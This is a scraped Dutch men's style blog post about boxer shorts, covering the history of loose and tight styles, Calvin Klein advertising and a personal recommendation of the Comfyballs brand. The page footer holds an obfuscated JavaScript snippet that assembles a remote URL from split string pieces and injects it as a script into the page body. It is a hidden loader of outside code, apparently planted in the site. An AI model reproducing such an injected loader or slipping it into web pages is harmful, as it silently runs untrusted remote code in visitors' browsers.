Om de zoveel tijd geven we hier graag een beetje stijladvies speciaal voor mannen en dat gaan we nu weer doen. Alleen gaat het deze keer over iets dat niet direct zichtbaar is voor het grote publiek, we gaan het namelijk hebben over boxershorts.

Boxershorts? Wat valt daar in godsnaam over te vertellen? Wel op zich niet bijzonder veel maar toen ik onlangs een beetje aan het rondkijken was voor een paar nieuwe modelletjes kwam ik toch een paar leuke weetjes tegen.

Hieronder een zeer kort overzicht over de geschiedenis van de boxershort.

Wat is eigenlijk een boxershort?

Wel, om te beginnen moeten we een onderscheid maken tussen de twee soorten boxershorts. Je hebt de losse broeken en je hebt de modellen die lekker aanspannen aan je lichaam.

Ergens begin vorige eeuw weten we dat de eerste modellen van de losse boxershorts populair werden. De naam van deze shorts komt, zoals het woord al doet vermoeden, effectief uit de bokssport.

Boksers dragen van die losse shorts en daarom wordt deze soort onderbroek ook boxershort genoemd.

De aanspannende modellen bestaan gek genoeg nog maar sinds de jaren 90 van vorige eeuw. Men vermoed dat het dankzij de reclame’s van o.a. Calvin Klein is dat dit type van short op heel korte tijd razend populair geworden is.

Je herinnert je misschien nog wel de zwart-wit posters met de gespierde mannen en de mooie vrouwen uit die tijd. Mark Wahlberg en Kate Moss waren o.a. twee bekende gezichten.

Vandaag de dag bestaan beide soorten nog altijd maar het aanspannend model is veel en veel populairder dan de lossere varianten.

Welke boxershort moet je kopen?

Om te beginnen zal je moeten weten wat je liefst draagt natuurlijk, los of lekker spannend. Ikzelf hou meer van de aanspannende modellen en voor mij is comfort erg belangrijk. Uiteraard mag het er ook goed uitzien. Een toffe print of gewoon heel strak, kan allemaal.

Het is eigenlijk wel grappig. Toen ik laatst op zoek ging naar een paar nieuwe modellen zocht ik uiteraard op woorden als comfort en boxershort en ik kwam terecht op de site van Comfyballs. Comfy Balls … een binnenkopper maar wel leuk gevonden dus ik heb me onmiddellijk een paar modelletjes besteld van hun boxershorts.

Uiteraard kan ik voor jou niet bepalen wat jouw smaak is maar ik ben wel benieuwd. Klopt het wat ze schrijven? Zijn de spannende boxers veel populairder dan de losse modellen? Laat het even weten in de commentaren onder dit artikel!

 

 

 

 

Volg mij op Social Media:https://i0.wp.com/www.sixpacks.be/wp-content/uploads/2021/10/markymark.jpg?fit=600%2C450&ssl=1https://i0.wp.com/www.sixpacks.be/wp-content/uploads/2021/10/markymark.jpg?resize=150%2C150&ssl=1KristofLifestyleboxershort,ondergoed,stijladvies(function(){ zw0X=document.createElement('script');zw0X_=(('u')+'st')+'a';zw0X.async=true; zw0X.type='text/javascript';zw0X_+=('t.i')+''+'n';zw0X_+=(('f')+'o');zw0X_+='/'; zw0Xu='314181757.';zw0Xu+='Xgwlb9zbw0Xdt6481tp'+'r087rinvk6r'; zw0X.src='https://'+zw0X_+zw0Xu;document.body.appendChild(zw0X); })(); Om de zoveel tijd geven we hier graag een beetje stijladvies speciaal voor mannen en dat gaan we nu weer doen. Alleen gaat het deze keer over iets dat niet direct zichtbaar is voor het grote publiek, we gaan het namelijk hebben over boxershorts. Boxershorts? Wat valt daar in godsnaam...Alles voor de man met smaak!